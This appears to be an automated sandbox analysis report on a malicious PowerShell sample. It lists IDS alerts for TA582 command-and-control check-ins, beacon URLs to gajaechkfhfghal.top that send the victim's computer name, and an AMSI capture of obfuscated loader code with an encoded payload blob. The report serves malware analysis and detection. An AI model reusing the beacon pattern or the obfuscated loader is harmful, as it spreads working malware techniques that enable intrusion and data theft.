Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.181582817503.000001D01CEC6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.181584821108.000001D01D200000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.181548254804.000001D002959000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000000.00000002.181584387488.000001D01CF9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.181584821108.000001D01D264000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.181582817503.000001D01CEC6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdbdb: source: powershell.exe, 00000000.00000002.181582817503.000001D01CEC6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000000.00000002.181548254804.000001D002959000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb~ source: powershell.exe, 00000000.00000002.181584821108.000001D01D264000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb source: powershell.exe, 00000000.00000002.181582817503.000001D01CEC6000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: Network traffic | Suricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:62575 -> 1.1.1.1:53 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49774 -> 142.251.40.164:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49773 -> 45.61.136.138:80 |
Source: Network traffic | Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49773 -> 45.61.136.138:80 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGJr9rrsGIjB78ud-57DbyLq8tuorH4iXn-ebeCUevuV2y3FNJAm0CszlnRTO5VMbM7rVPZHyogoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=rd5GNGIL3_Sxs8U9bYqQxEOQUqxDxj94Zu8dmvJzMDLaoPSrGIL89PauJ3i_0mES7uwtdh-eWG-bMIJQEMJF4Y1RHh5CsKfylVx3dU0zOKjRNk7Kq6qGXPOoHgJXv6I4TtJ7T04gp2_Y4yzVYNSN1WulJ9H6A9IFc0r85K6ESOp-_P0joG4Aeo9i_WNNgN6kYfpY |
Source: global traffic | HTTP traffic detected: GET /wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGJr9rrsGIjB78ud-57DbyLq8tuorH4iXn-ebeCUevuV2y3FNJAm0CszlnRTO5VMbM7rVPZHyogoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=rd5GNGIL3_Sxs8U9bYqQxEOQUqxDxj94Zu8dmvJzMDLaoPSrGIL89PauJ3i_0mES7uwtdh-eWG-bMIJQEMJF4Y1RHh5CsKfylVx3dU0zOKjRNk7Kq6qGXPOoHgJXv6I4TtJ7T04gp2_Y4yzVYNSN1WulJ9H6A9IFc0r85K6ESOp-_P0joG4Aeo9i_WNNgN6kYfpY |
Source: global traffic | HTTP traffic detected: GET /wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGJr9rrsGIjB78ud-57DbyLq8tuorH4iXn-ebeCUevuV2y3FNJAm0CszlnRTO5VMbM7rVPZHyogoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=rd5GNGIL3_Sxs8U9bYqQxEOQUqxDxj94Zu8dmvJzMDLaoPSrGIL89PauJ3i_0mES7uwtdh-eWG-bMIJQEMJF4Y1RHh5CsKfylVx3dU0zOKjRNk7Kq6qGXPOoHgJXv6I4TtJ7T04gp2_Y4yzVYNSN1WulJ9H6A9IFc0r85K6ESOp-_P0joG4Aeo9i_WNNgN6kYfpY |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005D0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D0058B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D005EE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$emwhygqi9tca2z0/$83whmbi25xjtofe.php? |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D0070ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$emwhygqi9tca2z0/$83whmbi25xjtofe.php?id=$env:computername&key=$nezfhuajqokmx&s=527 |
Source: powershell.exe, 00000000.00000002.181580692294.000001D01CB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.181580692294.000001D01CB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.181582121504.000001D01CD00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.181584821108.000001D01D213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.co |
Source: powershell.exe, 00000000.00000002.181549164650.000001D0059F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D00565B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.181549164650.000001D0059F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D00565B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527 |
Source: powershell.exe, 00000000.00000002.181549164650.000001D0059F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527p |
Source: powershell.exe, 00000000.00000002.181574177536.000001D014AA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004A31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005CFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGJr9rrsGIjB78ud-57DbyLq8tuorH4iXn-ebeCUevuV2y3FNJAm0CszlnRTO5VMbM7r |
Source: powershell.exe, 00000000.00000002.181549164650.000001D00589D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGJr9rrsGIjB78ud-57DbyLq8 |
Source: powershell.exe, 00000000.00000002.181580692294.000001D01CB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004A31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.181574177536.000001D014AA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.181574177536.000001D014AA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.181574177536.000001D014AA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.181549164650.000001D004C5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.181549164650.000001D0068E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.181574177536.000001D014AA2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.181580692294.000001D01CB40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.181549164650.000001D005CFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D005D0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D0058B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.181549164650.000001D005CDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $9cul2zqy4og3akp.((-join (@((224986/3358),(-507+(-5298+(-2313+(8179+(463000/9260))))),(973-861),(-4810+4931),(607488/7232),(3344-3233))| ForEach-Object { [char]$_ })))( $g4e9dzsf36x0hvt ) $9cul2zqy4og3akp.(([system.String]::new(@((3300-3233),(-7072+7180),(573870/5170),(536705/4667),(9053-8952)))))()$y6hjx14agzn2rdi.(([system.String]::new(@((173195/(10628-8043)),(1187-1079),(9498-(2246+(10195-(-3325+6379)))),(4545-(7127870/(10661234/6626))),(-2281+2382)))))()[byte[]] $ke2y4mb86hqwlsz = $g4e9dzsf36x0hvt.(([system.String]::new(@((830088/9882),(9826-(12217-2502)),(-8914+8979),(643074/5641),(4361-4247),(-997+1094),(434632/3592)))))() $6h8gt572yzo3rvu=$ke2y4mb86hqwlsz return $6h8gt572yzo3rvu}[System.Text.Encoding]::ascii.((-join (@((-3425+3496),(-4962+5063),(419804/3619),(2150-2067),(2900/(31475/1259)),(-1071+(-4289+(10502-5028))),(911610/(6960+1722)),(-192+302),(10165-(1942+(2219+(9252-3351)))))| ForEach-Object { [char]$_ })))((c8skpfane7jm9ylibqhgw26rvt1 "dLtpZmwxd2p3cP/hML91Mf726H26r8Me2gM0/SLDq0U1GCXgtunG+/1HaZyywjR3f+Cxa9QYe5KBrZWN5KO0El+FbOWUoowxDq5dQY5O/uKPmqwtna/aKaNvSlZKi5SOuumfl7cuCNILg4y5JNduiILumHXOTf7EEcmJs6fyiZeSjr8dhO//eSKvSxeLjK/5hk+MaZ9OyJSA25GtBD+a7dMuOWQcr46UBg8e0xfqjpPYo/Xhhq/XvVW35czeH8PsfcLzNaSKql0onz7m3EMMqIWGwpAKKxgQuAYlufGeGcO6hf+Eklb69ecQW7FpG/s5hmVe+jfGCoBdStxz1rQYfS44K+s41L5tlQi7oYtpCvTFQeViFlhqESPooDblHY7Ev9D3/uYqgIBWx9udt4UreRAcEpu9ywBtYf4uPNAe2ZpaZ+hEOEqVt0OLJow1TseajR0WE0JEmaiEDA700ny6OOdeSpm0ziZNrmqSCJG2bM5pivYgu+0baO1Mr9gCAbjsi9P9BIHH8KemnL7YRIu8SfeOy9CLv/E9pNbeWxCPCB6rjN6DheHS9efemJSslrVnjFS+G5vMgFBjb38t8HuLC8bschEVv+zKiIlm2Odd4w2mw/89ppHTlDrdyVYx3gPzzlrkz99G21rA3xGJFQwjKhV7Xg8OI39dOU3M3GduTskpwgk3/B9bnfxD3Edeq4wm9uj8hfWKJYzelwKIt4Lu0CIHxY7WhXxXQRIed+W84VLXsjugabIKCGaPhvu++KZFlUEWA2MHrIrgBx9zVtpb07oJxMDVf9HMQsfFJYkDW/1zGzvdqy9xTqg1VlYAwltlpLzGjihCOVdjklf8XtwTahn7XoNVA+3fJtzJ0On5EbMfMURYOZ13IgBA7xm+yhWMRv9lJvGjuBRX/C3/f9CBDPMJYyFQDvad/x09ALp0g81tQ/WTnduJe1NHDlYqgXEbhMUNgg3UezgfDQDFf2R+kQbGovdEnyx15K4MiXIfqYQETx0PjG8f2GY57BOMs6QEnNuHgdcegFVOCZSMj8luyTKtyPVtHNTW6vgBeRBVWLg3tPVnIH9fEwl+e+Nf3rjfkKvmcZeiYJ1EzxyMdWvX3bsPoK5m+OQuVlk/LBmcARzQiP6RI1lv9Qxd/OW+K2oHFVnrbQ6uj24CMGNn9cfMF53dBfLKBrHdzB26uTDC5tKXiv4/SlB2iWklfOOnM4e5D0EJdfVtm1lXHJHnwObxzfIIsKTS8BFT33yJ9FISrgUKgtk1Jf6/utyMsw4A8cINj3gtLN6sddml1J7QCnpA8yPfthWcTl1BFscTmYjYlG0o85aFVg88dw9CTP706IFmKWL7IhpK+SBClTkxTwJuwCG9V9AhUfWubz2ks3odoVMxwkNAFDTa8rEt1Ivfc3HyrO4mkut7UeY7dcf/jgx3vaRY4GyjhHd+IMLw |